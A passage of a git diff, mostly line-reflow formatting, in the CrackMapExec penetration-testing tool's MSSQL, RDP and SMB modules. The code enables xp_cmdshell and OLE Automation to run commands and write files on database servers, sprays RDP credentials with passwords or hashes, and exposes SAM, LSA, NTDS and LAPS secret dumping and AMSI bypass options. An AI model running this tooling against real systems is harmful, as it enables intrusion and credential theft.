self._MSSQL__rowsPrinter.info(f"ENVCHANGE({_type}): Old Value: {record['OldValue'].decode('utf-16le')}, New Value: {record['NewValue'].decode('utf-16le')}") tds.MSSQL.printReplies = printRepliesCME diff --git a/cme/protocols/mssql/database.py b/cme/protocols/mssql/database.py index bb28f493..ff8a6532 100755 --- a/cme/protocols/mssql/database.py +++ b/cme/protocols/mssql/database.py @@ -70,22 +70,11 @@ class database: def reflect_tables(self): with self.db_engine.connect() as conn: try: - self.HostsTable = Table( - "hosts", self.metadata, autoload_with=self.db_engine - ) - self.UsersTable = Table( - "users", self.metadata, autoload_with=self.db_engine - ) - self.AdminRelationsTable = Table( - "admin_relations", self.metadata, autoload_with=self.db_engine - ) + self.HostsTable = Table("hosts", self.metadata, autoload_with=self.db_engine) + self.UsersTable = Table("users", self.metadata, autoload_with=self.db_engine) + self.AdminRelationsTable = Table("admin_relations", self.metadata, autoload_with=self.db_engine) except (NoInspectionAvailable, NoSuchTableError): - print( - "[-] Error reflecting tables - this means there is a DB schema mismatch \n" - "[-] This is probably because a newer version of CME is being ran on an old DB schema\n" - "[-] If you wish to save the old DB data, copy it to a new location (`cp -r ~/.cme/workspaces/ ~/old_cme_workspaces/`)\n" - "[-] Then remove the CME DB folders (`rm -rf ~/.cme/workspaces/`) and rerun CME to initialize the new DB schema" - ) + print("[-] Error reflecting tables - this means there is a DB schema mismatch \n" "[-] This is probably because a newer version of CME is being ran on an old DB schema\n" "[-] If you wish to save the old DB data, copy it to a new location (`cp -r ~/.cme/workspaces/ ~/old_cme_workspaces/`)\n" "[-] Then remove the CME DB folders (`rm -rf ~/.cme/workspaces/`) and rerun CME to initialize the new DB schema") exit() def shutdown_db(self): @@ -148,9 +137,7 @@ class database: # TODO: find a way to abstract this away to a single Upsert call q = Insert(self.HostsTable) update_columns = {col.name: col for col in q.excluded if col.name not in "id"} - q = q.on_conflict_do_update( - index_elements=self.HostsTable.primary_key, set_=update_columns - ) + q = q.on_conflict_do_update(index_elements=self.HostsTable.primary_key, set_=update_columns) self.conn.execute(q, hosts) def add_credential(self, credtype, domain, username, password, pillaged_from=None): @@ -187,23 +174,17 @@ class database: "credtype": credtype, "pillaged_from_hostid": pillaged_from, } - q = insert(self.UsersTable).values( - user_data - ) # .returning(self.UsersTable.c.id) + q = insert(self.UsersTable).values(user_data) # .returning(self.UsersTable.c.id) self.conn.execute(q) # .first() else: for user in results: # might be able to just remove this if check, but leaving it in for now if not user[3] and not user[4] and not user[5]: - q = update(self.UsersTable).values( - credential_data - ) # .returning(self.UsersTable.c.id) + q = update(self.UsersTable).values(credential_data) # .returning(self.UsersTable.c.id) results = self.conn.execute(q) # .first() # user_rowid = results.id - cme_logger.debug( - f"add_credential(credtype={credtype}, domain={domain}, username={username}, password={password}, pillaged_from={pillaged_from})" - ) + cme_logger.debug(f"add_credential(credtype={credtype}, domain={domain}, username={username}, password={password}, pillaged_from={pillaged_from})") return user_rowid def remove_credentials(self, creds_id): @@ -254,13 +235,9 @@ class database: def get_admin_relations(self, user_id=None, host_id=None): if user_id: - q = select(self.AdminRelationsTable).filter( - self.AdminRelationsTable.c.userid == user_id - ) + q = select(self.AdminRelationsTable).filter(self.AdminRelationsTable.c.userid == user_id) elif host_id: - q = select(self.AdminRelationsTable).filter( - self.AdminRelationsTable.c.hostid == host_id - ) + q = select(self.AdminRelationsTable).filter(self.AdminRelationsTable.c.hostid == host_id) else: q = select(self.AdminRelationsTable) @@ -300,9 +277,7 @@ class database: # if we're filtering by username elif filter_term and filter_term != "": like_term = func.lower(f"%{filter_term}%") - q = select(self.UsersTable).filter( - func.lower(self.UsersTable.c.username).like(like_term) - ) + q = select(self.UsersTable).filter(func.lower(self.UsersTable.c.username).like(like_term)) # otherwise return all credentials else: q = select(self.UsersTable) @@ -338,10 +313,7 @@ class database: # if we're filtering by ip/hostname elif filter_term and filter_term != "": like_term = func.lower(f"%{filter_term}%") - q = select(self.HostsTable).filter( - self.HostsTable.c.ip.like(like_term) - | func.lower(self.HostsTable.c.hostname).like(like_term) - ) + q = select(self.HostsTable).filter(self.HostsTable.c.ip.like(like_term) | func.lower(self.HostsTable.c.hostname).like(like_term)) results = self.conn.execute(q).all() return results diff --git a/cme/protocols/mssql/db_navigator.py b/cme/protocols/mssql/db_navigator.py index ae7bd361..9415aeb9 100644 --- a/cme/protocols/mssql/db_navigator.py +++ b/cme/protocols/mssql/db_navigator.py @@ -130,12 +130,7 @@ class navigator(DatabaseNavigator): print_table(data, title="Admin Access to Host(s)") def do_clear_database(self, line): - if ( - input( - "This will destroy all data in the current database, are you SURE you want to run this? (y/n): " - ) - == "y" - ): + if input("This will destroy all data in the current database, are you SURE you want to run this? (y/n): ") == "y": self.db.clear_database() @staticmethod diff --git a/cme/protocols/mssql/mssqlexec.py b/cme/protocols/mssql/mssqlexec.py index 23296204..fc4dfa2f 100755 --- a/cme/protocols/mssql/mssqlexec.py +++ b/cme/protocols/mssql/mssqlexec.py @@ -24,9 +24,7 @@ class MSSQLEXEC: continue command_output.append(row["output"]) except Exception as e: - cme_logger.error( - f"Error when attempting to execute command via xp_cmdshell: {e}" - ) + cme_logger.error(f"Error when attempting to execute command via xp_cmdshell: {e}") if output: cme_logger.debug(f"Output is enabled") @@ -41,64 +39,41 @@ class MSSQLEXEC: try: self.disable_xp_cmdshell() except Exception as e: - cme_logger.error( - f"[OPSEC] Error when attempting to disable xp_cmdshell: {e}" - ) + cme_logger.error(f"[OPSEC] Error when attempting to disable xp_cmdshell: {e}") return command_output # return self.outputBuffer def enable_xp_cmdshell(self): - self.mssql_conn.sql_query( - "exec master.dbo.sp_configure 'show advanced options',1;RECONFIGURE;exec master.dbo.sp_configure 'xp_cmdshell', 1;RECONFIGURE;" - ) + self.mssql_conn.sql_query("exec master.dbo.sp_configure 'show advanced options',1;RECONFIGURE;exec master.dbo.sp_configure 'xp_cmdshell', 1;RECONFIGURE;") def disable_xp_cmdshell(self): - self.mssql_conn.sql_query( - "exec sp_configure 'xp_cmdshell', 0 ;RECONFIGURE;exec sp_configure 'show advanced options', 0 ;RECONFIGURE;" - ) + self.mssql_conn.sql_query("exec sp_configure 'xp_cmdshell', 0 ;RECONFIGURE;exec sp_configure 'show advanced options', 0 ;RECONFIGURE;") def enable_ole(self): - self.mssql_conn.sql_query( - "exec master.dbo.sp_configure 'show advanced options',1;RECONFIGURE;exec master.dbo.sp_configure 'Ole Automation Procedures', 1;RECONFIGURE;" - ) + self.mssql_conn.sql_query("exec master.dbo.sp_configure 'show advanced options',1;RECONFIGURE;exec master.dbo.sp_configure 'Ole Automation Procedures', 1;RECONFIGURE;") def disable_ole(self): - self.mssql_conn.sql_query( - "exec master.dbo.sp_configure 'show advanced options',1;RECONFIGURE;exec master.dbo.sp_configure 'Ole Automation Procedures', 0;RECONFIGURE;" - ) + self.mssql_conn.sql_query("exec master.dbo.sp_configure 'show advanced options',1;RECONFIGURE;exec master.dbo.sp_configure 'Ole Automation Procedures', 0;RECONFIGURE;") def put_file(self, data, remote): try: self.enable_ole() hexdata = data.hex() - self.mssql_conn.sql_query( - "DECLARE @ob INT;" - "EXEC sp_OACreate 'ADODB.Stream', @ob OUTPUT;" - "EXEC sp_OASetProperty @ob, 'Type', 1;" - "EXEC sp_OAMethod @ob, 'Open';" - "EXEC sp_OAMethod @ob, 'Write', NULL, 0x{};" - "EXEC sp_OAMethod @ob, 'SaveToFile', NULL, '{}', 2;" - "EXEC sp_OAMethod @ob, 'Close';" - "EXEC sp_OADestroy @ob;".format(hexdata, remote) - ) + self.mssql_conn.sql_query("DECLARE @ob INT;" "EXEC sp_OACreate 'ADODB.Stream', @ob OUTPUT;" "EXEC sp_OASetProperty @ob, 'Type', 1;" "EXEC sp_OAMethod @ob, 'Open';" "EXEC sp_OAMethod @ob, 'Write', NULL, 0x{};" "EXEC sp_OAMethod @ob, 'SaveToFile', NULL, '{}', 2;" "EXEC sp_OAMethod @ob, 'Close';" "EXEC sp_OADestroy @ob;".format(hexdata, remote)) self.disable_ole() except Exception as e: cme_logger.debug(f"Error uploading via mssqlexec: {e}") def file_exists(self, remote): try: - res = self.mssql_conn.batch( - f"DECLARE @r INT; EXEC master.dbo.xp_fileexist '{remote}', @r OUTPUT; SELECT @r as n" - )[0]["n"] + res = self.mssql_conn.batch(f"DECLARE @r INT; EXEC master.dbo.xp_fileexist '{remote}', @r OUTPUT; SELECT @r as n")[0]["n"] return res == 1 except: return False def get_file(self, remote, local): try: - self.mssql_conn.sql_query( - f"SELECT * FROM OPENROWSET(BULK N'{remote}', SINGLE_BLOB) rs" - ) + self.mssql_conn.sql_query(f"SELECT * FROM OPENROWSET(BULK N'{remote}', SINGLE_BLOB) rs") data = self.mssql_conn.rows[0]["BulkColumn"] with open(local, "wb+") as f: diff --git a/cme/protocols/rdp.py b/cme/protocols/rdp.py index d2426af9..194a8543 100644 --- a/cme/protocols/rdp.py +++ b/cme/protocols/rdp.py @@ -80,9 +80,7 @@ class rdp(connection): @staticmethod def proto_args(parser, std_parser, module_parser): - rdp_parser = parser.add_parser( - "rdp", help="own stuff using RDP", parents=[std_parser, module_parser] - ) + rdp_parser = parser.add_parser("rdp", help="own stuff using RDP", parents=[std_parser, module_parser]) rdp_parser.add_argument( "-H", "--hash", @@ -95,19 +93,14 @@ class rdp(connection): rdp_parser.add_argument( "--no-bruteforce", action="store_true", - help=( - "No spray when using file for username and password (user1 =>" - " password1, user2 => password2" - ), + help=("No spray when using file for username and password (user1 =>" " password1, user2 => password2"), ) rdp_parser.add_argument( "--continue-on-success", action="store_true", help="continues authentication attempts even after successes", ) - rdp_parser.add_argument( - "--port", type=int, default=3389, help="Custom RDP port" - ) + rdp_parser.add_argument("--port", type=int, default=3389, help="Custom RDP port") rdp_parser.add_argument( "--rdp-timeout", type=int, @@ -135,17 +128,13 @@ class rdp(connection): help="authenticate locally to each target", ) - egroup = rdp_parser.add_argument_group( - "Screenshot", "Remote Desktop Screenshot" - ) + egroup = rdp_parser.add_argument_group("Screenshot", "Remote Desktop Screenshot") egroup.add_argument( "--screenshot", action="store_true", help="Screenshot RDP if connection success", ) - egroup.add_argument( - "--screentime", type=int, default=10, help="Time to wait for desktop image" - ) + egroup.add_argument("--screentime", type=int, default=10, help="Time to wait for desktop image") egroup.add_argument( "--res", default="1024x768", @@ -176,24 +165,14 @@ class rdp(connection): def print_host_info(self): if self.domain is None: - self.logger.display( - "Probably old, doesn't not support HYBRID or HYBRID_EX" - f" (nla:{self.nla})" - ) + self.logger.display("Probably old, doesn't not support HYBRID or HYBRID_EX" f" (nla:{self.nla})") else: - self.logger.display( - f"{self.server_os} (name:{self.hostname}) (domain:{self.domain})" - f" (nla:{self.nla})" - ) + self.logger.display(f"{self.server_os} (name:{self.hostname}) (domain:{self.domain})" f" (nla:{self.nla})") return True def create_conn_obj(self): - self.target = RDPTarget( - ip=self.host, domain="FAKE", timeout=self.args.rdp_timeout - ) - self.auth = NTLMCredential( - secret="pass", username="user", domain="FAKE", stype=asyauthSecret.PASS - ) + self.target = RDPTarget(ip=self.host, domain="FAKE", timeout=self.args.rdp_timeout) + self.auth = NTLMCredential(secret="pass", username="user", domain="FAKE", stype=asyauthSecret.PASS) self.check_nla() @@ -216,15 +195,9 @@ class rdp(connection): info_domain = self.conn.get_extra_info() self.domain = info_domain["dnsdomainname"] self.hostname = info_domain["computername"] - self.server_os = ( - info_domain["os_guess"] - + " Build " - + str(info_domain["os_build"]) - ) + self.server_os = info_domain["os_guess"] + " Build " + str(info_domain["os_build"]) - self.output_filename = os.path.expanduser( - f"~/.cme/logs/{self.hostname}_{self.host}_{datetime.now().strftime('%Y-%m-%d_%H%M%S')}" - ) + self.output_filename = os.path.expanduser(f"~/.cme/logs/{self.hostname}_{self.host}_{datetime.now().strftime('%Y-%m-%d_%H%M%S')}") self.output_filename = self.output_filename.replace(":", "-") break @@ -254,11 +227,7 @@ class rdp(connection): credentials=self.auth, ) asyncio.run(self.connect_rdp()) - if ( - str(proto) == "SUPP_PROTOCOLS.RDP" - or str(proto) == "SUPP_PROTOCOLS.SSL" - or str(proto) == "SUPP_PROTOCOLS.SSL|SUPP_PROTOCOLS.RDP" - ): + if str(proto) == "SUPP_PROTOCOLS.RDP" or str(proto) == "SUPP_PROTOCOLS.SSL" or str(proto) == "SUPP_PROTOCOLS.SSL|SUPP_PROTOCOLS.RDP": self.nla = False return except Exception as e: @@ -307,15 +276,11 @@ class rdp(connection): if not password: password = getenv("KRB5CCNAME") if not password else password if "/" in password: - self.logger.fail( - "Kerberos ticket need to be on the local directory" - ) + self.logger.fail("Kerberos ticket need to be on the local directory") return False ccache = CCache.loadFile(getenv("KRB5CCNAME")) ticketCreds = ccache.credentials[0] - username = ( - ticketCreds["client"].prettyPrint().decode().split("@")[0] - ) + username = ticketCreds["client"].prettyPrint().decode().split("@")[0] else: stype = asyauthSecret.PASS if not nthash else asyauthSecret.NT @@ -334,9 +299,7 @@ class rdp(connection): domain=domain, stype=stype, ) - self.conn = RDPConnection( - iosettings=self.iosettings, target=self.target, credentials=self.auth - ) + self.conn = RDPConnection(iosettings=self.iosettings, target=self.target, credentials=self.auth) asyncio.run(self.connect_rdp()) self.admin_privs = True @@ -348,12 +311,7 @@ class rdp(connection): # Show what was used between cleartext, nthash, aesKey and ccache " from ccache" if useCache - else ":%s" - % ( - kerb_pass - if not self.config.get("CME", "audit_mode") - else self.config.get("CME", "audit_mode") * 8 - ) + else ":%s" % (kerb_pass if not self.config.get("CME", "audit_mode") else self.config.get("CME", "audit_mode") * 8) ), self.mark_pwned(), ) @@ -370,22 +328,11 @@ class rdp(connection): if word in str(e): reason = self.rdp_error_status[word] self.logger.fail( - ( - f"{domain}\\{username}{' from ccache' if useCache else ':%s' % (kerb_pass if not self.config.get('CME', 'audit_mode') else self.config.get('CME', 'audit_mode') * 8)} {f'({reason})' if reason else str(e)}" - ), - color=( - "magenta" - if ( - (reason or "CredSSP" in str(e)) - and reason != "KDC_ERR_C_PRINCIPAL_UNKNOWN" - ) - else "red" - ), + (f"{domain}\\{username}{' from ccache' if useCache else ':%s' % (kerb_pass if not self.config.get('CME', 'audit_mode') else self.config.get('CME', 'audit_mode') * 8)} {f'({reason})' if reason else str(e)}"), + color=("magenta" if ((reason or "CredSSP" in str(e)) and reason != "KDC_ERR_C_PRINCIPAL_UNKNOWN") else "red"), ) elif "Authentication failed!" in str(e): - self.logger.success( - f"{domain}\\{username}:{password} {self.mark_pwned()}" - ) + self.logger.success(f"{domain}\\{username}:{password} {self.mark_pwned()}") elif "No such file" in str(e): self.logger.fail(e) else: @@ -396,17 +343,8 @@ class rdp(connection): if "cannot unpack non-iterable NoneType object" == str(e): reason = "User valid but cannot connect" self.logger.fail( - ( - f"{domain}\\{username}{' from ccache' if useCache else ':%s' % (kerb_pass if not self.config.get('CME', 'audit_mode') else self.config.get('CME', 'audit_mode') * 8)} {f'({reason})' if reason else ''}" - ), - color=( - "magenta" - if ( - (reason or "CredSSP" in str(e)) - and reason != "STATUS_LOGON_FAILURE" - ) - else "red" - ), + (f"{domain}\\{username}{' from ccache' if useCache else ':%s' % (kerb_pass if not self.config.get('CME', 'audit_mode') else self.config.get('CME', 'audit_mode') * 8)} {f'({reason})' if reason else ''}"), + color=("magenta" if ((reason or "CredSSP" in str(e)) and reason != "STATUS_LOGON_FAILURE") else "red"), ) return False @@ -418,9 +356,7 @@ class rdp(connection): domain=domain, stype=asyauthSecret.PASS, ) - self.conn = RDPConnection( - iosettings=self.iosettings, target=self.target, credentials=self.auth - ) + self.conn = RDPConnection(iosettings=self.iosettings, target=self.target, credentials=self.auth) asyncio.run(self.connect_rdp()) self.admin_privs = True @@ -431,9 +367,7 @@ class rdp(connection): return True except Exception as e: if "Authentication failed!" in str(e): - self.logger.success( - f"{domain}\\{username}:{password} {self.mark_pwned()}" - ) + self.logger.success(f"{domain}\\{username}:{password} {self.mark_pwned()}") else: reason = None for word in self.rdp_error_status.keys(): @@ -442,17 +376,8 @@ class rdp(connection): if "cannot unpack non-iterable NoneType object" == str(e): reason = "User valid but cannot connect" self.logger.fail( - ( - f"{domain}\\{username}:{password} {f'({reason})' if reason else ''}" - ), - color=( - "magenta" - if ( - (reason or "CredSSP" in str(e)) - and reason != "STATUS_LOGON_FAILURE" - ) - else "red" - ), + (f"{domain}\\{username}:{password} {f'({reason})' if reason else ''}"), + color=("magenta" if ((reason or "CredSSP" in str(e)) and reason != "STATUS_LOGON_FAILURE") else "red"), ) return False @@ -464,24 +389,18 @@ class rdp(connection): domain=domain, stype=asyauthSecret.NT, ) - self.conn = RDPConnection( - iosettings=self.iosettings, target=self.target, credentials=self.auth - ) + self.conn = RDPConnection(iosettings=self.iosettings, target=self.target, credentials=self.auth) asyncio.run(self.connect_rdp()) self.admin_privs = True - self.logger.success( - f"{self.domain}\\{username}:{ntlm_hash} {self.mark_pwned()}" - ) + self.logger.success(f"{self.domain}\\{username}:{ntlm_hash} {self.mark_pwned()}") if not self.args.local_auth: add_user_bh(username, domain, self.logger, self.config) if not self.args.continue_on_success: return True except Exception as e: if "Authentication failed!" in str(e): - self.logger.success( - f"{domain}\\{username}:{ntlm_hash} {self.mark_pwned()}" - ) + self.logger.success(f"{domain}\\{username}:{ntlm_hash} {self.mark_pwned()}") else: reason = None for word in self.rdp_error_status.keys(): @@ -491,25 +410,14 @@ class rdp(connection): reason = "User valid but cannot connect" self.logger.fail( - ( - f"{domain}\\{username}:{ntlm_hash} {f'({reason})' if reason else ''}" - ), - color=( - "magenta" - if ( - (reason or "CredSSP" in str(e)) - and reason != "STATUS_LOGON_FAILURE" - ) - else "red" - ), + (f"{domain}\\{username}:{ntlm_hash} {f'({reason})' if reason else ''}"), + color=("magenta" if ((reason or "CredSSP" in str(e)) and reason != "STATUS_LOGON_FAILURE") else "red"), ) return False async def screen(self): try: - self.conn = RDPConnection( - iosettings=self.iosettings, target=self.target, credentials=self.auth - ) + self.conn = RDPConnection(iosettings=self.iosettings, target=self.target, credentials=self.auth) await self.connect_rdp() except Exception as e: return @@ -517,9 +425,7 @@ class rdp(connection): await asyncio.sleep(int(5)) if self.conn is not None and self.conn.desktop_buffer_has_data is True: buffer = self.conn.get_desktop_buffer(VIDEO_FORMAT.PIL) - filename = os.path.expanduser( - f"~/.cme/screenshots/{self.hostname}_{self.host}_{datetime.now().strftime('%Y-%m-%d_%H%M%S')}.png" - ) + filename = os.path.expanduser(f"~/.cme/screenshots/{self.hostname}_{self.host}_{datetime.now().strftime('%Y-%m-%d_%H%M%S')}.png") buffer.save(filename, "png") self.logger.highlight(f"Screenshot saved {filename}") @@ -529,20 +435,14 @@ class rdp(connection): async def nla_screen(self): # Otherwise it crash self.iosettings.supported_protocols = None - self.auth = NTLMCredential( - secret="", username="", domain="", stype=asyauthSecret.PASS - ) - self.conn = RDPConnection( - iosettings=self.iosettings, target=self.target, credentials=self.auth - ) + self.auth = NTLMCredential(secret="", username="", domain="", stype=asyauthSecret.PASS) + self.conn = RDPConnection(iosettings=self.iosettings, target=self.target, credentials=self.auth) await self.connect_rdp_old(self.url) await asyncio.sleep(int(self.args.screentime)) if self.conn is not None and self.conn.desktop_buffer_has_data is True: buffer = self.conn.get_desktop_buffer(VIDEO_FORMAT.PIL) - filename = os.path.expanduser( - f"~/.cme/screenshots/{self.hostname}_{self.host}_{datetime.now().strftime('%Y-%m-%d_%H%M%S')}.png" - ) + filename = os.path.expanduser(f"~/.cme/screenshots/{self.hostname}_{self.host}_{datetime.now().strftime('%Y-%m-%d_%H%M%S')}.png") buffer.save(filename, "png") self.logger.highlight(f"NLA Screenshot saved {filename}") diff --git a/cme/protocols/rdp/database.py b/cme/protocols/rdp/database.py index fb144a24..3cc915b0 100644 --- a/cme/protocols/rdp/database.py +++ b/cme/protocols/rdp/database.py @@ -49,19 +49,10 @@ class database: def reflect_tables(self): with self.db_engine.connect() as conn: try: - self.CredentialsTable = Table( - "credentials", self.metadata, autoload_with=self.db_engine - ) - self.HostsTable = Table( - "hosts", self.metadata, autoload_with=self.db_engine - ) + self.CredentialsTable = Table("credentials", self.metadata, autoload_with=self.db_engine) + self.HostsTable = Table("hosts", self.metadata, autoload_with=self.db_engine) except (NoInspectionAvailable, NoSuchTableError): - print( - "[-] Error reflecting tables - this means there is a DB schema mismatch \n" - "[-] This is probably because a newer version of CME is being ran on an old DB schema\n" - "[-] If you wish to save the old DB data, copy it to a new location (`cp -r ~/.cme/workspaces/ ~/old_cme_workspaces/`)\n" - "[-] Then remove the CME DB folders (`rm -rf ~/.cme/workspaces/`) and rerun CME to initialize the new DB schema" - ) + print("[-] Error reflecting tables - this means there is a DB schema mismatch \n" "[-] This is probably because a newer version of CME is being ran on an old DB schema\n" "[-] If you wish to save the old DB data, copy it to a new location (`cp -r ~/.cme/workspaces/ ~/old_cme_workspaces/`)\n" "[-] Then remove the CME DB folders (`rm -rf ~/.cme/workspaces/`) and rerun CME to initialize the new DB schema") exit() def shutdown_db(self): diff --git a/cme/protocols/rdp/db_navigator.py b/cme/protocols/rdp/db_navigator.py index b1afbf92..36777af1 100644 --- a/cme/protocols/rdp/db_navigator.py +++ b/cme/protocols/rdp/db_navigator.py @@ -6,12 +6,7 @@ from cme.cmedb import DatabaseNavigator, print_help class navigator(DatabaseNavigator): def do_clear_database(self, line): - if ( - input( - "This will destroy all data in the current database, are you SURE you want to run this? (y/n): " - ) - == "y" - ): + if input("This will destroy all data in the current database, are you SURE you want to run this? (y/n): ") == "y": self.db.clear_database() def help_clear_database(self): diff --git a/cme/protocols/smb.py b/cme/protocols/smb.py index af268b65..bf955420 100755 --- a/cme/protocols/smb.py +++ b/cme/protocols/smb.py @@ -163,14 +163,13 @@ class smb(connection): self.pvkbytes = None self.no_da = None self.no_ntlm = False + self.protocol = "SMB" connection.__init__(self, args, db, host) @staticmethod def proto_args(parser, std_parser, module_parser): - smb_parser = parser.add_parser( - "smb", help="own stuff using SMB", parents=[std_parser, module_parser] - ) + smb_parser = parser.add_parser("smb", help="own stuff using SMB", parents=[std_parser, module_parser]) smb_parser.add_argument( "-H", "--hash", @@ -243,16 +242,10 @@ class smb(connection): const="administrator", ) - cgroup = smb_parser.add_argument_group( - "Credential Gathering", "Options for gathering credentials" - ) + cgroup = smb_parser.add_argument_group("Credential Gathering", "Options for gathering credentials") cegroup = cgroup.add_mutually_exclusive_group() - cegroup.add_argument( - "--sam", action="store_true", help="dump SAM hashes from target systems" - ) - cegroup.add_argument( - "--lsa", action="store_true", help="dump LSA secrets from target systems" - ) + cegroup.add_argument("--sam", action="store_true", help="dump SAM hashes from target systems") + cegroup.add_argument("--lsa", action="store_true", help="dump LSA secrets from target systems") cegroup.add_argument( "--ntds", choices={"vss", "drsuapi"}, @@ -270,47 +263,31 @@ class smb(connection): # cgroup.add_argument("--ntds-history", action='store_true', help='Dump NTDS.dit password history') # cgroup.add_argument("--ntds-pwdLastSet", action='store_true', help='Shows the pwdLastSet attribute for each NTDS.dit account') - ngroup = smb_parser.add_argument_group( - "Credential Gathering", "Options for gathering credentials" - ) + ngroup = smb_parser.add_argument_group("Credential Gathering", "Options for gathering credentials") ngroup.add_argument( "--mkfile", action="store", help="DPAPI option. File with masterkeys in form of {GUID}:SHA1", ) - ngroup.add_argument( - "--pvk", action="store", help="DPAPI option. File with domain backupkey" - ) - ngroup.add_argument( - "--enabled", action="store_true", help="Only dump enabled targets from DC" - ) - ngroup.add_argument( - "--user", dest="userntds", type=str, help="Dump selected user from DC" - ) + ngroup.add_argument("--pvk", action="store", help="DPAPI option. File with domain backupkey") + ngroup.add_argument("--enabled", action="store_true", help="Only dump enabled targets from DC") + ngroup.add_argument("--user", dest="userntds", type=str, help="Dump selected user from DC") - egroup = smb_parser.add_argument_group( - "Mapping/Enumeration", "Options for Mapping/Enumerating" - ) - egroup.add_argument( - "--shares", action="store_true", help="enumerate shares and access" - ) + egroup = smb_parser.add_argument_group("Mapping/Enumeration", "Options for Mapping/Enumerating") + egroup.add_argument("--shares", action="store_true", help="enumerate shares and access") egroup.add_argument( "--filter-shares", nargs="+", help="Filter share by access, option 'read' 'write' or 'read,write'", ) - egroup.add_argument( - "--sessions", action="store_true", help="enumerate active sessions" - ) + egroup.add_argument("--sessions", action="store_true", help="enumerate active sessions") egroup.add_argument("--disks", action="store_true", help="enumerate disks") egroup.add_argument( "--loggedon-users-filter", action="store", help="only search for specific user, works with regex", ) - egroup.add_argument( - "--loggedon-users", action="store_true", help="enumerate logged on users" - ) + egroup.add_argument("--loggedon-users", action="store_true", help="enumerate logged on users") egroup.add_argument( "--users", nargs="?", @@ -339,9 +316,7 @@ class smb(connection): metavar="GROUP", help="enumerate local groups, if a group is specified then its members are enumerated", ) - egroup.add_argument( - "--pass-pol", action="store_true", help="dump password policy" - ) + egroup.add_argument("--pass-pol", action="store_true", help="dump password policy") egroup.add_argument( "--rid-brute", nargs="?", @@ -350,9 +325,7 @@ class smb(connection): metavar="MAX_RID", help="enumerate users by bruteforcing RID's (default: 4000)", ) - egroup.add_argument( - "--wmi", metavar="QUERY", type=str, help="issues the specified WMI query" - ) + egroup.add_argument("--wmi", metavar="QUERY", type=str, help="issues the specified WMI query") egroup.add_argument( "--wmi-namespace", metavar="NAMESPACE", @@ -360,12 +333,8 @@ class smb(connection): help="WMI Namespace (default: root\\cimv2)", ) - sgroup = smb_parser.add_argument_group( - "Spidering", "Options for spidering shares" - ) - sgroup.add_argument( - "--spider", metavar="SHARE", type=str, help="share to spider" - ) + sgroup = smb_parser.add_argument_group("Spidering", "Options for spidering shares") + sgroup.add_argument("--spider", metavar="SHARE", type=str, help="share to spider") sgroup.add_argument( "--spider-folder", metavar="FOLDER", @@ -373,9 +342,7 @@ class smb(connection): type=str, help="folder to spider (default: root share directory)", ) - sgroup.add_argument( - "--content", action="store_true", help="enable file content searching" - ) + sgroup.add_argument("--content", action="store_true", help="enable file content searching") sgroup.add_argument( "--exclude-dirs", type=str, @@ -400,13 +367,9 @@ class smb(connection): default=None, help="max spider recursion depth (default: infinity & beyond)", ) - sgroup.add_argument( - "--only-files", action="store_true", help="only spider files" - ) + sgroup.add_argument("--only-files", action="store_true", help="only spider files") - tgroup = smb_parser.add_argument_group( - "Files", "Options for put and get remote files" - ) + tgroup = smb_parser.add_argument_group("Files", "Options for put and get remote files") tgroup.add_argument( "--put-file", nargs=2, @@ -425,9 +388,7 @@ class smb(connection): help="append the host to the get-file filename", ) - cgroup = smb_parser.add_argument_group( - "Command Execution", "Options for executing commands" - ) + cgroup = smb_parser.add_argument_group("Command Execution", "Options for executing commands") cgroup.add_argument( "--exec-method", choices={"wmiexec", "mmcexec", "smbexec", "atexec"}, @@ -437,20 +398,14 @@ class smb(connection): cgroup.add_argument( "--codec", default="utf-8", - help="Set encoding used (codec) from the target's output (default " - '"utf-8"). If errors are detected, run chcp.com at the target, ' - "map the result with " - "https://docs.python.org/3/library/codecs.html#standard-encodings and then execute " - "again with --codec and the corresponding codec", + help="Set encoding used (codec) from the target's output (default " '"utf-8"). If errors are detected, run chcp.com at the target, ' "map the result with " "https://docs.python.org/3/library/codecs.html#standard-encodings and then execute " "again with --codec and the corresponding codec", ) cgroup.add_argument( "--force-ps32", action="store_true", help="force the PowerShell command to run in a 32-bit process", ) - cgroup.add_argument( - "--no-output", action="store_true", help="do not retrieve command output" - ) + cgroup.add_argument("--no-output", action="store_true", help="do not retrieve command output") cegroup = cgroup.add_mutually_exclusive_group() cegroup.add_argument( "-x", @@ -464,12 +419,8 @@ class smb(connection): dest="ps_execute", help="execute the specified PowerShell command", ) - psgroup = smb_parser.add_argument_group( - "Powershell Obfuscation", "Options for PowerShell script obfuscation" - ) - psgroup.add_argument( - "--obfs", action="store_true", help="Obfuscate PowerShell scripts" - ) + psgroup = smb_parser.add_argument_group("Powershell Obfuscation", "Options for PowerShell script obfuscation") + psgroup.add_argument("--obfs", action="store_true", help="Obfuscate PowerShell scripts") psgroup.add_argument( "--amsi-bypass", nargs=1, @@ -533,9 +484,7 @@ class smb(connection): self.no_ntlm = True pass - self.domain = ( - self.conn.getServerDNSDomainName() if not self.no_ntlm else self.args.domain - ) + self.domain = self.conn.getServerDNSDomainName() if not self.no_ntlm else self.args.domain self.hostname = self.conn.getServerName() if not self.no_ntlm else self.host self.server_os = self.conn.getServerOS() self.logger.extra["hostname"] = self.hostname @@ -544,19 +493,13 @@ class smb(connection): self.server_os = self.server_os.decode("utf-8") try: - self.signing = ( - self.conn.isSigningRequired() - if self.smbv1 - else self.conn._SMBConnection._Connection["RequireSigning"] - ) + self.signing = self.conn.isSigningRequired() if self.smbv1 else self.conn._SMBConnection._Connection["RequireSigning"] except Exception as e: self.logger.debug(e) pass self.os_arch = self.get_os_arch() - self.output_filename = os.path.expanduser( - f"~/.cme/logs/{self.hostname}_{self.host}_{datetime.now().strftime('%Y-%m-%d_%H%M%S')}" - ) + self.output_filename = os.path.expanduser(f"~/.cme/logs/{self.hostname}_{self.host}_{datetime.now().strftime('%Y-%m-%d_%H%M%S')}") self.output_filename = self.output_filename.replace(":", "-") if not self.domain: @@ -614,20 +557,14 @@ class smb(connection): return False - search_filter = ( - "(&(objectCategory=computer)(|(msLAPS-EncryptedPassword=*)(ms-MCS-AdmPwd=*)(msLAPS-Password=*))(name=" - + self.hostname - + "))" - ) + search_filter = "(&(objectCategory=computer)(|(msLAPS-EncryptedPassword=*)(ms-MCS-AdmPwd=*)(msLAPS-Password=*))(name=" + self.hostname + "))" attributes = [ "msLAPS-EncryptedPassword", "msLAPS-Password", "ms-MCS-AdmPwd", "sAMAccountName", ] - results = connection.search( - searchFilter=search_filter, attributes=attributes, sizeLimit=0 - ) + results = connection.search(searchFilter=search_filter, attributes=attributes, sizeLimit=0) msMCSAdmPwd = 